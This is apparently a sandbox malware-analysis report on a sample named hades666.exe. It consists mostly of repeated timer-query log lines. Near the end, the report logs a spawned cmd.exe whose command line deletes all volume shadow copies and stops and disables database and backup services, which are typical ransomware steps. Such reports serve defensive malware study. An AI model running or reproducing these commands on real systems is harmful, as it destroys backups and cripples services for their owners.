Get Time type = Performance Ctr, time = 14224121275 True 1
Fn
Get Time type = Performance Ctr, time = 14224442198 True 1
Fn
Get Time type = Performance Ctr, time = 14224670616 True 1
Fn
Get Time type = Performance Ctr, time = 14225055567 True 1
Fn
Get Time type = Performance Ctr, time = 14225248342 True 1
Fn
Get Time type = Performance Ctr, time = 14226750771 True 1
Fn
Get Time type = Performance Ctr, time = 14226869739 True 1
Fn
Get Time type = Performance Ctr, time = 14227376814 True 1
Fn
Get Time type = Performance Ctr, time = 14227625176 True 1
Fn
Get Time type = Performance Ctr, time = 14228875675 True 1
Fn
Get Time type = Performance Ctr, time = 14229030166 True 1
Fn
Get Time type = Performance Ctr, time = 14236495448 True 1
Fn
Get Time type = Performance Ctr, time = 14236744095 True 1
Fn
Get Time type = Performance Ctr, time = 14237509109 True 1
Fn
Get Time type = Performance Ctr, time = 14237663096 True 1
Fn
Get Time type = Performance Ctr, time = 14238017263 True 1
Fn
Get Time type = Performance Ctr, time = 14238278098 True 1
Fn
Get Time type = Performance Ctr, time = 14239036114 True 1
Fn
Get Time type = Performance Ctr, time = 14239260506 True 1
Fn
Get Time type = Performance Ctr, time = 14240657020 True 1
Fn
Get Time type = Performance Ctr, time = 14240907464 True 1
Fn
Get Time type = Performance Ctr, time = 14241329792 True 1
Fn
Get Time type = Performance Ctr, time = 14241454942 True 1
Fn
Get Time type = Performance Ctr, time = 14241915871 True 1
Fn
Get Time type = Performance Ctr, time = 14242161107 True 1
Fn
Get Time type = Performance Ctr, time = 14279015583 True 1
Fn
Get Time type = Performance Ctr, time = 14279255462 True 1
Fn
Get Time type = Performance Ctr, time = 14284517028 True 1
Fn
Get Time type = Performance Ctr, time = 14284641850 True 1
Fn
Get Time type = Performance Ctr, time = 14285540349 True 1
Fn
Get Time type = Performance Ctr, time = 14291946616 True 1
Fn
Get Time type = Performance Ctr, time = 14292771710 True 1
Fn
Get Time type = Performance Ctr, time = 14293717189 True 1
Fn
Get Time type = Performance Ctr, time = 14293831127 True 1
Fn
Get Time type = Performance Ctr, time = 14301186253 True 1
Fn
Get Time type = Performance Ctr, time = 14301916595 True 1
Fn
Get Time type = Performance Ctr, time = 14320615687 True 1
Fn
Get Time type = Performance Ctr, time = 14321615126 True 1
Fn
Get Time type = Performance Ctr, time = 14335351189 True 1
Fn
Get Time type = Performance Ctr, time = 14341017385 True 1
Fn
Get Time type = Performance Ctr, time = 14352044468 True 1
Fn
Get Time type = Performance Ctr, time = 14372860350 True 1
Fn
Get Time type = Performance Ctr, time = 14372974440 True 1
Fn
Get Time type = Performance Ctr, time = 14373558674 True 1
Fn
Get Time type = Performance Ctr, time = 14373822568 True 1
Fn
Get Time type = Performance Ctr, time = 14374292911 True 1
Fn
Get Time type = Performance Ctr, time = 14374568648 True 1
Fn
Get Time type = Performance Ctr, time = 14375004384 True 1
Fn
Get Time type = Performance Ctr, time = 14375195505 True 1
Fn
Get Time type = Performance Ctr, time = 14375581929 True 1
Fn
Get Time type = Performance Ctr, time = 14375694754 True 1
Fn
Get Time type = Performance Ctr, time = 14376147933 True 1
Fn
Get Time type = Performance Ctr, time = 14376396368 True 1
Fn
Get Time type = Performance Ctr, time = 14376820282 True 1
Fn
Get Time type = Performance Ctr, time = 14377013503 True 1
Fn
Get Time type = Performance Ctr, time = 14377390009 True 1
Fn
Get Time type = Performance Ctr, time = 14377545688 True 1
Fn
Get Time type = Performance Ctr, time = 14377937018 True 1
Fn
Get Time type = Performance Ctr, time = 14378036980 True 1
Fn
Get Time type = Performance Ctr, time = 14378399493 True 1
Fn
Get Time type = Performance Ctr, time = 14378624429 True 1
Fn
Get Time type = Performance Ctr, time = 14379027412 True 1
Fn
Get Time type = Performance Ctr, time = 14379164563 True 1
Fn
Get Time type = Performance Ctr, time = 14379553043 True 1
Fn
Get Time type = Performance Ctr, time = 14379750259 True 1
Fn
Get Time type = Performance Ctr, time = 14380307501 True 1
Fn
Get Time type = Performance Ctr, time = 14380611779 True 1
Fn
Get Time type = Performance Ctr, time = 14381196803 True 1
Fn
Get Time type = Performance Ctr, time = 14381351677 True 1
Fn
Get Time type = Performance Ctr, time = 14381732891 True 1
Fn
Get Time type = Performance Ctr, time = 14381827501 True 1
Fn
Get Time type = Performance Ctr, time = 14382170997 True 1
Fn
Get Time type = Performance Ctr, time = 14382352922 True 1
Fn
Get Time type = Performance Ctr, time = 14382715926 True 1
Fn
Get Time type = Performance Ctr, time = 14382846884 True 1
Fn
Get Time type = Performance Ctr, time = 14383221364 True 1
Fn
Get Time type = Performance Ctr, time = 14383374790 True 1
Fn
Get Time type = Performance Ctr, time = 14383720817 True 1
Fn
Get Time type = Performance Ctr, time = 14383935845 True 1
Fn
Get Time type = Performance Ctr, time = 14384308976 True 1
Fn
Get Time type = Performance Ctr, time = 14384574759 True 1
Fn
Get Time type = Performance Ctr, time = 14385370216 True 1
Fn
Get Time type = Performance Ctr, time = 14385511917 True 1
Fn
Get Time type = Performance Ctr, time = 14386008731 True 1
Fn
Get Time type = Performance Ctr, time = 14386206186 True 1
Fn
Get Time type = Performance Ctr, time = 14386831693 True 1
Fn
Get Time type = Performance Ctr, time = 14386932315 True 1
Fn
Get Time type = Performance Ctr, time = 14387310113 True 1
Fn
Get Time type = Performance Ctr, time = 14387420945 True 1
Fn
Get Time type = Performance Ctr, time = 14387784222 True 1
Fn
Get Time type = Performance Ctr, time = 14387993833 True 1
Fn
Get Time type = Performance Ctr, time = 14388397625 True 1
Fn
Get Time type = Performance Ctr, time = 14388661265 True 1
Fn
Get Time type = Performance Ctr, time = 14389068097 True 1
Fn
Get Time type = Performance Ctr, time = 14389169587 True 1
Fn
Get Time type = Performance Ctr, time = 14389520537 True 1
Fn
Get Time type = Performance Ctr, time = 14389672606 True 1
Fn
Get Time type = Performance Ctr, time = 14390271207 True 1
Fn
Get Time type = Performance Ctr, time = 14390404442 True 1
Fn
Get Time type = Performance Ctr, time = 14390775159 True 1
Fn
Get Time type = Performance Ctr, time = 14391017065 True 1
Fn
Get Time type = Performance Ctr, time = 14433777861 True 1
Fn
Get Time type = Performance Ctr, time = 14433949290 True 1
Fn
Get Time type = Performance Ctr, time = 14434356160 True 1
Fn
Get Time type = Performance Ctr, time = 14434516638 True 1
Fn
Get Time type = Performance Ctr, time = 14443897835 True 1
Fn
Get Time type = Performance Ctr, time = 14444032422 True 1
Fn
Get Time type = Performance Ctr, time = 14444497891 True 1
Fn
Get Time type = Performance Ctr, time = 14446150321 True 1
Fn
Get Time type = Performance Ctr, time = 14455345476 True 1
Fn
Get Time type = Performance Ctr, time = 14455503878 True 1
Fn
Get Time type = Performance Ctr, time = 14455987662 True 1
Fn
Get Time type = Performance Ctr, time = 14456157930 True 1
Fn
Get Time type = Performance Ctr, time = 14462865172 True 1
Fn
Get Time type = Performance Ctr, time = 14462980382 True 1
Fn
Get Time type = Performance Ctr, time = 14463417135 True 1
Fn
Get Time type = Performance Ctr, time = 14463529170 True 1
Fn
Get Time type = Performance Ctr, time = 14464036106 True 1
Fn
Get Time type = Performance Ctr, time = 14464149821 True 1
Fn
Get Time type = Performance Ctr, time = 14464910382 True 1
Fn
Get Time type = Performance Ctr, time = 14465019763 True 1
Fn
Get Time type = Performance Ctr, time = 14465449177 True 1
Fn
Get Time type = Performance Ctr, time = 14465562751 True 1
Fn
Get Time type = Performance Ctr, time = 14466046649 True 1
Fn
Get Time type = Performance Ctr, time = 14466159313 True 1
Fn
Get Time type = Performance Ctr, time = 14466640491 True 1
Fn
Get Time type = Performance Ctr, time = 14476780474 True 1
Fn
Get Time type = Performance Ctr, time = 14477254724 True 1
Fn
Get Time type = Performance Ctr, time = 14477372307 True 1
Fn
Get Time type = Performance Ctr, time = 14477826699 True 1
Fn
Get Time type = Performance Ctr, time = 14477999098 True 1
Fn
Get Time type = Performance Ctr, time = 14478481863 True 1
Fn
Get Time type = Performance Ctr, time = 14478594180 True 1
Fn
Get Time type = Performance Ctr, time = 14479005933 True 1
Fn
Get Time type = Performance Ctr, time = 14479118108 True 1
Fn
Get Time type = Performance Ctr, time = 14479920005 True 1
Fn
Get Time type = Performance Ctr, time = 14480030070 True 1
Fn
Get Time type = Performance Ctr, time = 14480711455 True 1
Fn
Get Time type = Performance Ctr, time = 14480847496 True 1
Fn
Get Time type = Performance Ctr, time = 14481287448 True 1
Fn
Get Time type = Performance Ctr, time = 14481397076 True 1
Fn
Get Time type = Performance Ctr, time = 14481896403 True 1
Fn
Get Time type = Performance Ctr, time = 14482004875 True 1
Fn
Get Time type = Performance Ctr, time = 14485648818 True 1
Fn
Get Time type = Performance Ctr, time = 14485762168 True 1
Fn
Get Time type = Performance Ctr, time = 14486188039 True 1
Fn
Get Time type = Performance Ctr, time = 14486297015 True 1
Fn
Get Time type = Performance Ctr, time = 14486713998 True 1
Fn
Get Time type = Performance Ctr, time = 14486830843 True 1
Fn
Get Time type = Performance Ctr, time = 14488975430 True 1
Fn
Get Time type = Performance Ctr, time = 14489090051 True 1
Fn
Get Time type = Performance Ctr, time = 14489475926 True 1
Fn
Get Time type = Performance Ctr, time = 14489586436 True 1
Fn
Get Time type = Performance Ctr, time = 14489967982 True 1
Fn
Get Time type = Performance Ctr, time = 14490079703 True 1
Fn
Get Time type = Performance Ctr, time = 14490732098 True 1
Fn
Get Time type = Performance Ctr, time = 14490849815 True 1
Fn
Get Time type = Performance Ctr, time = 14491310306 True 1
Fn
Get Time type = Performance Ctr, time = 14491422739 True 1
Fn
Get Time type = Performance Ctr, time = 14491948305 True 1
Fn
Get Time type = Performance Ctr, time = 14492060266 True 1
Fn
Get Time type = Performance Ctr, time = 14492457663 True 1
Fn
Get Time type = Performance Ctr, time = 14492568438 True 1
Fn
Get Time type = Performance Ctr, time = 14493041671 True 1
Fn
Get Time type = Performance Ctr, time = 14493151465 True 1
Fn
Get Time type = Performance Ctr, time = 14493585439 True 1
Fn
Get Time type = Performance Ctr, time = 14493697457 True 1
Fn
Get Time type = Performance Ctr, time = 14494100432 True 1
Fn
Get Time type = Performance Ctr, time = 14494210998 True 1
Fn
Get Time type = Performance Ctr, time = 14494615065 True 1
Fn
Get Time type = Performance Ctr, time = 14494728484 True 1
Fn
Get Time type = Performance Ctr, time = 14495172470 True 1
Fn
Get Time type = Performance Ctr, time = 14495286984 True 1
Fn
Get Time type = Performance Ctr, time = 14495720987 True 1
Fn
Get Time type = Performance Ctr, time = 14495831562 True 1
Fn
Get Time type = Performance Ctr, time = 14496210901 True 1
Fn
Get Time type = Performance Ctr, time = 14496323385 True 1
Fn
Get Time type = Performance Ctr, time = 14496742704 True 1
Fn
Get Time type = Performance Ctr, time = 14496854800 True 1
Fn
Get Time type = Performance Ctr, time = 14497424775 True 1
Fn
Get Time type = Performance Ctr, time = 14497534060 True 1
Fn
Get Time type = Performance Ctr, time = 14498761061 True 1
Fn
Get Time type = Performance Ctr, time = 14498887920 True 1
Fn
Get Time type = Performance Ctr, time = 14499316412 True 1
Fn
Get Time type = Performance Ctr, time = 14499430347 True 1
Fn
Get Time type = Performance Ctr, time = 14499829600 True 1
Fn
Get Time type = Performance Ctr, time = 14499943402 True 1
Fn
Get Time type = Performance Ctr, time = 14500340551 True 1
Fn
Get Time type = Performance Ctr, time = 14500454949 True 1
Fn
Get Time type = Performance Ctr, time = 14501378106 True 1
Fn
Get Time type = Performance Ctr, time = 14501489725 True 1
Fn
Get Time type = Performance Ctr, time = 14501922194 True 1
Fn
Get Time type = Performance Ctr, time = 14502037227 True 1
Fn
Get Time type = Performance Ctr, time = 14502437632 True 1
Fn
Get Time type = Performance Ctr, time = 14502550421 True 1
Fn
Get Time type = Performance Ctr, time = 14503231519 True 1
Fn
Get Time type = Performance Ctr, time = 14503370381 True 1
Fn
Get Time type = Performance Ctr, time = 14503822602 True 1
Fn
Get Time type = Performance Ctr, time = 14503933318 True 1
Fn
Get Time type = Performance Ctr, time = 14504326475 True 1
Fn
Get Time type = Performance Ctr, time = 14504437554 True 1
Fn
Get Time type = Performance Ctr, time = 14504831283 True 1
Fn
Get Time type = Performance Ctr, time = 14504963688 True 1
Fn
Get Time type = Performance Ctr, time = 14505370438 True 1
Fn
Get Time type = Performance Ctr, time = 14505506529 True 1
Fn
Get Time type = Performance Ctr, time = 14505943820 True 1
Fn
Get Time type = Performance Ctr, time = 14506056168 True 1
Fn
Get Time type = Performance Ctr, time = 14506467875 True 1
Fn
Get Time type = Performance Ctr, time = 14506580589 True 1
Fn
Get Time type = Performance Ctr, time = 14507456727 True 1
Fn
Get Time type = Performance Ctr, time = 14507577280 True 1
Fn
Get Time type = Performance Ctr, time = 14507958232 True 1
Fn
Get Time type = Performance Ctr, time = 14508072029 True 1
Fn
Get Time type = Performance Ctr, time = 14508465451 True 1
Fn
Get Time type = Performance Ctr, time = 14508577707 True 1
Fn
Get Time type = Performance Ctr, time = 14508982535 True 1
Fn
Get Time type = Performance Ctr, time = 14509092597 True 1
Fn
Get Time type = Performance Ctr, time = 14509520471 True 1
Fn
Get Time type = Performance Ctr, time = 14509630968 True 1
Fn
Get Time type = Performance Ctr, time = 14510284751 True 1
Fn
Get Time type = Performance Ctr, time = 14510410778 True 1
Fn
Get Time type = Performance Ctr, time = 14510949875 True 1
Fn
Get Time type = Performance Ctr, time = 14511076373 True 1
Fn
Get Time type = Performance Ctr, time = 14511468743 True 1
Fn
Get Time type = Performance Ctr, time = 14511597265 True 1
Fn
Get Time type = Performance Ctr, time = 14512003539 True 1
Fn
Get Time type = Performance Ctr, time = 14512134408 True 1
Fn
Get Time type = Performance Ctr, time = 14512524428 True 1
Fn
Get Time type = Performance Ctr, time = 14512635551 True 1
Fn
Get Time type = Performance Ctr, time = 14513723530 True 1
Fn
Get Time type = Performance Ctr, time = 14513835477 True 1
Fn
Get Time type = Performance Ctr, time = 14514233854 True 1
Fn
Get Time type = Performance Ctr, time = 14514345838 True 1
Fn
Get Time type = Performance Ctr, time = 14514752885 True 1
Fn
Get Time type = Performance Ctr, time = 14514862002 True 1
Fn
Get Time type = Performance Ctr, time = 14515255562 True 1
Fn
Get Time type = Performance Ctr, time = 14515367078 True 1
Fn
Get Time type = Performance Ctr, time = 14515979116 True 1
Fn
Get Time type = Performance Ctr, time = 14516093387 True 1
Fn
Get Time type = Performance Ctr, time = 14516752099 True 1
Fn
Get Time type = Performance Ctr, time = 14516864418 True 1
Fn
Get Time type = Performance Ctr, time = 14517246641 True 1
Fn
Get Time type = Performance Ctr, time = 14517362345 True 1
Fn
Get Time type = Performance Ctr, time = 14517767134 True 1
Fn
Get Time type = Performance Ctr, time = 14517878150 True 1
Fn
Get Time type = Performance Ctr, time = 14518339504 True 1
Fn
Get Time type = Performance Ctr, time = 14518455509 True 1
Fn
Get Time type = Performance Ctr, time = 14518894208 True 1
Fn
Get Time type = Performance Ctr, time = 14519010031 True 1
Fn
Get Time type = Performance Ctr, time = 14519401464 True 1
Fn
Get Time type = Performance Ctr, time = 14519516454 True 1
Fn
Get Time type = Performance Ctr, time = 14519978569 True 1
Fn
Get Time type = Performance Ctr, time = 14520090796 True 1
Fn
Get Time type = Performance Ctr, time = 14520792977 True 1
Fn
Get Time type = Performance Ctr, time = 14520907914 True 1
Fn
Get Time type = Performance Ctr, time = 14521319313 True 1
Fn
Get Time type = Performance Ctr, time = 14521456081 True 1
Fn
Get Time type = Performance Ctr, time = 14521908853 True 1
Fn
Get Time type = Performance Ctr, time = 14522024901 True 1
Fn
Get Time type = Performance Ctr, time = 14522492134 True 1
Fn
Get Time type = Performance Ctr, time = 14522609765 True 1
Fn
Get Time type = Performance Ctr, time = 14523335438 True 1
Fn
Get Time type = Performance Ctr, time = 14523448861 True 1
Fn
Get Time type = Performance Ctr, time = 14523857786 True 1
Fn
Get Time type = Performance Ctr, time = 14523972273 True 1
Fn
Get Time type = Performance Ctr, time = 14524378612 True 1
Fn
Get Time type = Performance Ctr, time = 14524491564 True 1
Fn
Get Time type = Performance Ctr, time = 14525355483 True 1
Fn
Get Time type = Performance Ctr, time = 14525469569 True 1
Fn
Get Time type = Performance Ctr, time = 14526455921 True 1
Fn
Get Time type = Performance Ctr, time = 14526570416 True 1
Fn
Get Time type = Performance Ctr, time = 14526970446 True 1
Fn
Get Time type = Performance Ctr, time = 14527082982 True 1
Fn
Get Time type = Performance Ctr, time = 14527459971 True 1
Fn
Get Time type = Performance Ctr, time = 14527571966 True 1
Fn
Get Time type = Performance Ctr, time = 14527977715 True 1
Fn
Get Time type = Performance Ctr, time = 14528090968 True 1
Fn
Get Time type = Performance Ctr, time = 14528479058 True 1
Fn
Get Time type = Performance Ctr, time = 14528591220 True 1
Fn
Get Time type = Performance Ctr, time = 14529002062 True 1
Fn
Get Time type = Performance Ctr, time = 14529114318 True 1
Fn
Get Time type = Performance Ctr, time = 14529893816 True 1
Fn
Get Time type = Performance Ctr, time = 14530011031 True 1
Fn
Get Time type = Performance Ctr, time = 14530437770 True 1
Fn
Get Time type = Performance Ctr, time = 14530554479 True 1
Fn
Get Time type = Performance Ctr, time = 14530984934 True 1
Fn
Get Time type = Performance Ctr, time = 14531106152 True 1
Fn
Get Time type = Performance Ctr, time = 14531538738 True 1
Fn
Get Time type = Performance Ctr, time = 14531656952 True 1
Fn
Get Time type = Performance Ctr, time = 14532086163 True 1
Fn
Get Time type = Performance Ctr, time = 14532204152 True 1
Fn
Get Time type = Performance Ctr, time = 14532640647 True 1
Fn
Get Time type = Performance Ctr, time = 14532756873 True 1
Fn
Get Time type = Performance Ctr, time = 14533237803 True 1
Fn
Get Time type = Performance Ctr, time = 14533356049 True 1
Fn
Get Time type = Performance Ctr, time = 14533958339 True 1
Fn
Get Time type = Performance Ctr, time = 14534070465 True 1
Fn
Get Time type = Performance Ctr, time = 14534467490 True 1
Fn
Get Time type = Performance Ctr, time = 14534580963 True 1
Fn
Get Time type = Performance Ctr, time = 14534988368 True 1
Fn
Get Time type = Performance Ctr, time = 14535101287 True 1
Fn
Get Time type = Performance Ctr, time = 14535547085 True 1
Fn
Get Time type = Performance Ctr, time = 14535659578 True 1
Fn
Get Time type = Performance Ctr, time = 14536292092 True 1
Fn
Get Time type = Performance Ctr, time = 14536405017 True 1
Fn
Get Time type = Performance Ctr, time = 14536841337 True 1
Fn
Get Time type = Performance Ctr, time = 14536954697 True 1
Fn
Get Time type = Performance Ctr, time = 14537356009 True 1
Fn
Get Time type = Performance Ctr, time = 14537469541 True 1
Fn
Get Time type = Performance Ctr, time = 14538582742 True 1
Fn
Get Time type = Performance Ctr, time = 14538713256 True 1
Fn
Get Time type = Performance Ctr, time = 14539093138 True 1
Fn
Get Time type = Performance Ctr, time = 14539207624 True 1
Fn
Get Time type = Performance Ctr, time = 14539595468 True 1
Fn
Get Time type = Performance Ctr, time = 14539708413 True 1
Fn
Get Time type = Performance Ctr, time = 14540114317 True 1
Fn
Get Time type = Performance Ctr, time = 14540260556 True 1
Fn
Get Time type = Performance Ctr, time = 14540688549 True 1
Fn
Get Time type = Performance Ctr, time = 14540800194 True 1
Fn
Get Time type = Performance Ctr, time = 14541190361 True 1
Fn
Get Time type = Performance Ctr, time = 14541302578 True 1
Fn
Get Time type = Performance Ctr, time = 14541706692 True 1
Fn
Get Time type = Performance Ctr, time = 14541905678 True 1
Fn
Get Time type = Performance Ctr, time = 14543231650 True 1
Fn
Get Time type = Performance Ctr, time = 14543366986 True 1
Fn
Get Time type = Performance Ctr, time = 14544248761 True 1
Fn
Get Time type = Performance Ctr, time = 14544359067 True 1
Fn
Get Time type = Performance Ctr, time = 14544734621 True 1
Fn
Get Time type = Performance Ctr, time = 14545014640 True 1
Fn
Get Time type = Performance Ctr, time = 14545390628 True 1
Fn
Get Time type = Performance Ctr, time = 14545500017 True 1
Fn
Get Time type = Performance Ctr, time = 14545910338 True 1
Fn
Get Time type = Performance Ctr, time = 14546021042 True 1
Fn
Get Time type = Performance Ctr, time = 14546457769 True 1
Fn
Get Time type = Performance Ctr, time = 14546571893 True 1
Fn
Get Time type = Performance Ctr, time = 14546958659 True 1
Fn
Get Time type = Performance Ctr, time = 14547069344 True 1
Fn
Get Time type = Performance Ctr, time = 14547468843 True 1
Fn
Get Time type = Performance Ctr, time = 14547578999 True 1
Fn
Get Time type = Performance Ctr, time = 14548121699 True 1
Fn
Get Time type = Performance Ctr, time = 14548233297 True 1
Fn
Get Time type = Performance Ctr, time = 14548662815 True 1
Fn
Get Time type = Performance Ctr, time = 14548774059 True 1
Fn
Get Time type = Performance Ctr, time = 14549334427 True 1
Fn
Get Time type = Performance Ctr, time = 14549445153 True 1
Fn
Get Time type = Performance Ctr, time = 14549889426 True 1
Fn
Get Time type = Performance Ctr, time = 14550002139 True 1
Fn
Get Time type = Performance Ctr, time = 14550920419 True 1
Fn
Get Time type = Performance Ctr, time = 14551033461 True 1
Fn
Get Time type = Performance Ctr, time = 14551479053 True 1
Fn
Get Time type = Performance Ctr, time = 14551593936 True 1
Fn
Get Time type = Performance Ctr, time = 14552029732 True 1
Fn
Get Time type = Performance Ctr, time = 14552146963 True 1
Fn
Get Time type = Performance Ctr, time = 14552716370 True 1
Fn
Get Time type = Performance Ctr, time = 14552830549 True 1
Fn
Get Time type = Performance Ctr, time = 14553246401 True 1
Fn
Get Time type = Performance Ctr, time = 14553362248 True 1
Fn
Get Time type = Performance Ctr, time = 14553781963 True 1
Fn
Get Time type = Performance Ctr, time = 14553894425 True 1
Fn
Get Time type = Performance Ctr, time = 14554460485 True 1
Fn
Get Time type = Performance Ctr, time = 14554563446 True 1
Fn
Get Time type = Performance Ctr, time = 14554967721 True 1
Fn
Get Time type = Performance Ctr, time = 14555079339 True 1
Fn
Get Time type = Performance Ctr, time = 14555810687 True 1
Fn
Get Time type = Performance Ctr, time = 14555932295 True 1
Fn
Get Time type = Performance Ctr, time = 14556376131 True 1
Fn
Get Time type = Performance Ctr, time = 14556496734 True 1
Fn
Get Time type = Performance Ctr, time = 14557112156 True 1
Fn
Get Time type = Performance Ctr, time = 14557234606 True 1
Fn
Get Time type = Performance Ctr, time = 14557683577 True 1
Fn
Get Time type = Performance Ctr, time = 14557806553 True 1
Fn
Get Time type = Performance Ctr, time = 14558249357 True 1
Fn
Get Time type = Performance Ctr, time = 14558369620 True 1
Fn
Get Time type = Performance Ctr, time = 14558800807 True 1
Fn
Get Time type = Performance Ctr, time = 14558933672 True 1
Fn
Get Time type = Performance Ctr, time = 14559365262 True 1
Fn
Get Time type = Performance Ctr, time = 14559482993 True 1
Fn
Get Time type = Performance Ctr, time = 14559925079 True 1
Fn
Get Time type = Performance Ctr, time = 14560043972 True 1
Fn
Get Time type = Performance Ctr, time = 14561018517 True 1
Fn
Get Time type = Performance Ctr, time = 14561141771 True 1
Fn
Get Time type = Performance Ctr, time = 14562956563 True 1
Fn
Get Time type = Performance Ctr, time = 14563080725 True 1
Fn
Get Time type = Performance Ctr, time = 14563511596 True 1
Fn
Get Time type = Performance Ctr, time = 14563654772 True 1
Fn
Get Time type = Performance Ctr, time = 14564079704 True 1
Fn
Get Time type = Performance Ctr, time = 14564199738 True 1
Fn
Get Time type = Performance Ctr, time = 14564645234 True 1
Fn
Get Time type = Performance Ctr, time = 14564768408 True 1
Fn
Get Time type = Performance Ctr, time = 14565204648 True 1
Fn
Get Time type = Performance Ctr, time = 14565333482 True 1
Fn
Get Time type = Performance Ctr, time = 14565751654 True 1
Fn
Get Time type = Performance Ctr, time = 14565872140 True 1
Fn
Get Time type = Performance Ctr, time = 14566302049 True 1
Fn
Get Time type = Performance Ctr, time = 14566421748 True 1
Fn
Get Time type = Performance Ctr, time = 14567137917 True 1
Fn
Get Time type = Performance Ctr, time = 14567255713 True 1
Fn
Get Time type = Performance Ctr, time = 14567682057 True 1
Fn
Get Time type = Performance Ctr, time = 14567804128 True 1
Fn
Get Time type = Performance Ctr, time = 14568233160 True 1
Fn
Get Time type = Performance Ctr, time = 14568360963 True 1
Fn
Get Time type = Performance Ctr, time = 14569062548 True 1
Fn
Get Time type = Performance Ctr, time = 14569185310 True 1
Fn
Get Time type = Performance Ctr, time = 14569634228 True 1
Fn
Get Time type = Performance Ctr, time = 14569750345 True 1
Fn
Get Time type = Performance Ctr, time = 14570208997 True 1
Fn
Get Time type = Performance Ctr, time = 14570330247 True 1
Fn
Get Time type = Performance Ctr, time = 14570770256 True 1
Fn
Get Time type = Performance Ctr, time = 14570891780 True 1
Fn
Get Time type = Performance Ctr, time = 14571328935 True 1
Fn
Get Time type = Performance Ctr, time = 14571453556 True 1
Fn
Get Time type = Performance Ctr, time = 14572102019 True 1
Fn
Get Time type = Performance Ctr, time = 14572240612 True 1
Fn
Get Time type = Performance Ctr, time = 14573618944 True 1
Fn
Get Time type = Performance Ctr, time = 14573740890 True 1
Fn
Get Time type = Performance Ctr, time = 14574173079 True 1
Fn
Get Time type = Performance Ctr, time = 14574291929 True 1
Fn
Get Time type = Performance Ctr, time = 14574714777 True 1
Fn
Get Time type = Performance Ctr, time = 14574835317 True 1
Fn
Get Time type = Performance Ctr, time = 14575570785 True 1
Fn
Get Time type = Performance Ctr, time = 14575687291 True 1
Fn
Get Time type = Performance Ctr, time = 14576175176 True 1
Fn
Get Time type = Performance Ctr, time = 14576297136 True 1
Fn
Get Time type = Performance Ctr, time = 14576740500 True 1
Fn
Get Time type = Performance Ctr, time = 14576861504 True 1
Fn
Get Time type = Performance Ctr, time = 14577477547 True 1
Fn
Get Time type = Performance Ctr, time = 14577598143 True 1
Fn
Get Time type = Performance Ctr, time = 14578077100 True 1
Fn
Get Time type = Performance Ctr, time = 14578202445 True 1
Fn
Get Time type = Performance Ctr, time = 14578628399 True 1
Fn
Get Time type = Performance Ctr, time = 14578751179 True 1
Fn
Get Time type = Performance Ctr, time = 14579173681 True 1
Fn
Get Time type = Performance Ctr, time = 14579313135 True 1
Fn
Get Time type = Performance Ctr, time = 14579764609 True 1
Fn
Get Time type = Performance Ctr, time = 14579882612 True 1
Fn
Get Time type = Performance Ctr, time = 14580299134 True 1
Fn
Get Time type = Performance Ctr, time = 14580420022 True 1
Fn
Get Time type = Performance Ctr, time = 14580835078 True 1
Fn
Get Time type = Performance Ctr, time = 14580954828 True 1
Fn
Get Time type = Performance Ctr, time = 14582113353 True 1
Fn
Get Time type = Performance Ctr, time = 14582249535 True 1
Fn
Get Time type = Performance Ctr, time = 14585240569 True 1
Fn
Get Time type = Performance Ctr, time = 14585369562 True 1
Fn
Get Time type = Performance Ctr, time = 14600238773 True 1
Fn
Get Time type = Performance Ctr, time = 14600397607 True 1
Fn
Get Time type = Performance Ctr, time = 14601169573 True 1
Fn
Get Time type = Performance Ctr, time = 14601325192 True 1
Fn
Get Time type = Performance Ctr, time = 14601839519 True 1
Fn
Get Time type = Performance Ctr, time = 14601950806 True 1
Fn
Get Time type = Performance Ctr, time = 14602605123 True 1
Fn
Get Time type = Performance Ctr, time = 14602751625 True 1
Fn
Get Time type = Performance Ctr, time = 14603679543 True 1
Fn
Get Time type = Performance Ctr, time = 14603797772 True 1
Fn
Get Time type = Performance Ctr, time = 14604425421 True 1
Fn
Get Time type = Performance Ctr, time = 14604552125 True 1
Fn
Get Time type = Performance Ctr, time = 14605001118 True 1
Fn
For performance reasons, the remaining 5 entries are omitted.
The remaining entries can be found in glog.xml.
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Get Environment String name = allusersprofile, result_out = C:\ProgramData True 1
Fn
Process #2: cmd.exe
50 0
»
Information Value
ID #2
File Name c:\windows\syswow64\cmd.exe
Command Line Truncated command line: C:\WINDOWS\system32\cmd.exe /c @echo off sc config browser sc config browser start=enabled vssadmin delete shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWr...
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:37, Reason: Child Process
Unmonitor End Time: 00:00:43, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
»
Information Value
PID 0xcb8
Parent PID 0xaf0 (c:\users\fd1hvy\desktop\hades666.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 7EC
0x CC4
Host Behavior
File (12)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\FD1HVy\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 6
Fn
Open STD_INPUT_HANDLE - True 4
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
